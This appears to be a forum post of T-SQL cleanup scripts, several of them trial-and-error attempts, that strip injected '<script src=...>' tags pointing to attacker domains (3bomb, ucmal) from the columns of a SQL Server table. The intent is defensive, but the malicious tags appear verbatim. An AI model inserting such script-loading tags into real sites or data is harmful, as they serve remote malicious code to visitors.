34,838
社区成员




update buss set 企业名称=replace(企业名称,'<script src=http://3bomb.%63%6Fm/c.js></script><script src=http://3bomb.%63%6Fm/c.js></script><script src=http://3bomb.%63%6Fm/c.js></script><script src=http://3bomb.%63%6Fm/c.js></script>','')
declare @s varchar(8000)
select @s=isnull(@s,'')+'update buss set '+name+'=replace('+name+','<script src=http://3bomb.%63%6Fm/c.js>','')' from syscolumns where id=object_id('buss')
print @s
exec(@s)
declare @s varchar(8000)
select @s=isnull(@s,'')+'update buss set '+name+'=replace('+name+','''<script src=http://3bomb.%63%6Fm/c.js>''','')' from syscolumns where id=object_id('buss')
print @s
exec(@s)
declare @s varchar(8000)
select @s=isnull(@s,'')+'update buss set '+name+'=replace('+name+',''<script src=http://3bomb.%63%6Fm/c.js>'','''')' from syscolumns where id=object_id('buss')
print @s
exec(@s)
DECLARE @fieldtype sysname
SET @fieldtype='varchar'
--删除处理
DECLARE hCForEach CURSOR GLOBAL
FOR
SELECT N'update '+QUOTENAME(o.name)
+N' set '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script_src=http://ucmal.com/0.js> </script>'','''')'
FROM sysobjects o,syscolumns c,systypes t
WHERE o.id=c.id
AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
AND c.xusertype=t.xusertype
AND t.name=@fieldtype
EXEC sp_MSforeach_Worker @command1=N'?'